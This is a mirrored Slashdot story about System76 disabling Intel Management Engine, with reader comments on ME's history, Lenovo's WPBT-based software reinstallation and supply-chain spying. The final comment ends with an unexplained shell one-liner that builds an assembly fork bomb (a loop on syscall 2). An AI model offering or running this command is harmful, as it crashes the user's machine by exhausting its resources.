Slashdot Mirror
System76 Will Disable Intel Management Engine On Its Linux Laptops (liliputing.com)
System76 is rolling out a firmware update for its recent laptops that will disable the Intel Management Engine altogether. The decision comes after a major security vulnerability was discovered that would allow an attacker with local access to execute arbitrary code. Liliputing reports: What's noteworthy in the System76 announcement is that the PC maker isn't just planning to disable Intel ME in computers that ship from now on. The company will send out an update that disables it on existing computers with 6th, 7th, or 8th-gen Intel Core processors. System76 also notes that Intel ME "provides no functionality for System76 laptop customers and is safe to disable." Right now the firmware update will only be available for computers running Ubuntu 16.04 or later or a related operating system with the System76 driver. But the company says it's working on developing a command line tool that should work on laptops running other GNU/Linux-based operating systems. System76 says it will also release an update for its desktop computers... but on those machines the update will patch the security vulnerability rather than disabling Intel ME altogether.
I want to belieeeeeve!!! Save us system76 you're our only hope!!
At this point all AMD has to do is willingly release the information to provably disable their own management engine equivalent and they can sweep the market.
Too late, amd has psp.
Avantgarde Hebrew science fiction
There was new-ish news about this from the summer. A few privacy-minded places are starting to shut the ME down in various ways, some by spoofing the flag the government uses to disable it on its own systems, others in other ways.
...IME was originally designed for servers only. Any OldFarts(TM) out there - remember crash carts? Yeah, the ability to remotely power-cycle servers was a really big deal when you're running hundreds/thousands of servers and VMs were just a pie in the sky. Also, basic front-end network management 101 handled security. There are still good reasons to allow IME in server deployments, but I see no good reason for including this in laptops. I suspect that this was brought into the Core line due to those people building servers needing remote management using i7, etc. chips, but that's just a guess.
Your downmodded posts aren't hidden. They are correctly categorized as garbage. Some people will browse and see the 0 and -1 garbage, usually other mods or brave people with too much free time.
Reasons that APK deserves frequent downmoding:
1. lacks an account and always posts as AC
2. makes duplicate posts
3. admits to trying to avoid moderation
4. frequently posts off topic advertisements for his [free] products and services.
5. talks like a git. really his English phrasing is bizarre.
“Common sense is not so common.” — Voltaire
...I can't agree with the many reactionary Slashdot commenters...
...there should be a simple and transparent way to completely and verifiably disable it, ...
I think it’s a bit more than that. The feature may be useful, but the outrage is legitimate. Consumers, most of whom arguably have no need for such feature, fortuitously found out about its existence and that it is enabled in their computers. They had not been told about it, so they had no way to even try to use it. Other people (government, corporate, hackers) knew about it, so the malicious among those were in the position of abusing it (by exploiting its features and its security flaws). No wonder consumers are in arms over this. They are not over-reacting.
So, no, a way to disable it is not enough. This kind of feature requires full disclosure (before you buy), documentation (so that you can actually use the feature if you want) and, at least on systems sold to consumers who are unlikely to use it, it should be entirely disabled by default. Institutional customers who buy computers in quantity can (and indeed do) request the configuration that they want (including, for example, activation of Intel’s anti-theft protection).
Isn't it mind-boggling that Minix is actually more used on laptops currently than Linux?
(The management engine runs custom version of Minix)
There are no atheists when recovering from tape backup.
It gets worse. Some of them are probably still using Thinkpads, even though they're made by Lenovo. Now you'll say "No worries, if they re-image them they can avoid any spyware Lenovo put in there at the behest of the Chinese government".
Uh yeah, that won't help. Lenovo uses the WIndows Platform Binary feature to reinstall it. Basically you put an executable file into one of the ACPI tables. Windows copies it to disk and then runs it. With Administrator access. Probably more than Administrator access actually - I bet a native executable has more privilege than one running with Administrator rights on the Win32 subsystem does.
https://www.theregister.co.uk/...
To pull this off, the LSE exploits Microsoft's Windows Platform Binary Table (WPBT) feature. This allows PC manufacturers and corporate IT to inject drivers, programs and other files into the Windows operating system from the motherboard firmware.
The WPBT is stored in the firmware, and tells Windows where in memory it can find an executable called a platform binary to run. Said executable will take care of the job of installing files before the operating system starts.
"During operating system initialization, Windows will read the WPBT to obtain the physical memory location of the platform binary," Microsoft's documentation states.
"The binary is required to be a native, user-mode application that is executed by the Windows Session Manager during operating system initialization. Windows will write the flat image to disk, and the Session Manager will launch the process."
Crucially, the WPBT documentation stresses:
The primary purpose of WPBT is to allow critical software to persist even when the operating system has changed or been reinstalled in a "clean" configuration ... Because this feature provides the ability to persistently execute system software in the context of Windows, it becomes critical that WPBT-based solutions are as secure as possible and do not expose Windows users to exploitable conditions.
Oh dear. Secure as possible? Not in this case: security researcher Roel Schouwenberg found and reported a buffer-overflow vulnerability in the LSE that can be exploited to gain administrator-level privileges.
I.e. even if you reinstall them from a known clean image, they can still regrow the amputated LSE. And even if the LSE is not spyware, it contains exploitable vulnerabilities that a third party could use to install whatever they wanted. Lenovo didn't do this in Thinkpads, but they could.
At the moment the US is in the midst of media created paranoia about Russian hackers. Honestly if I were in charge of cybersecurity I'd be a lot more worried that the Chinese spy services would use something like LSE, with or without the cooperation of Lenovo, to spy on sensitive stuff.
And of course it's not just Lenovo laptops. There's Huawei phones and routers. Or indeed US brands which make routers in China could have either hacked firmware loaded onto them or the Chinese spy agencies could find an stockpile vulnerabilities in the manufacturer's firmware.
And then you have companies like XiaoMi with their young pioneer uniformed bunny signifying their devotion to the regime as a Taiwanese friend of mine pointed out
https://hungermarketingchina.w...
If you buy US stuff, you expect the US companies to cooperate with the NSA. If you buy Chinese stuff you expect Chinese companies to cooperate with its Chinese equivalents. XiaoMi's Young Pioneer bunny is none to subtle sign by the company that they're pro regime and it's not unreasonable to assume if the government asked them to help it out with national security they'd say yes.
Of course I can see
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;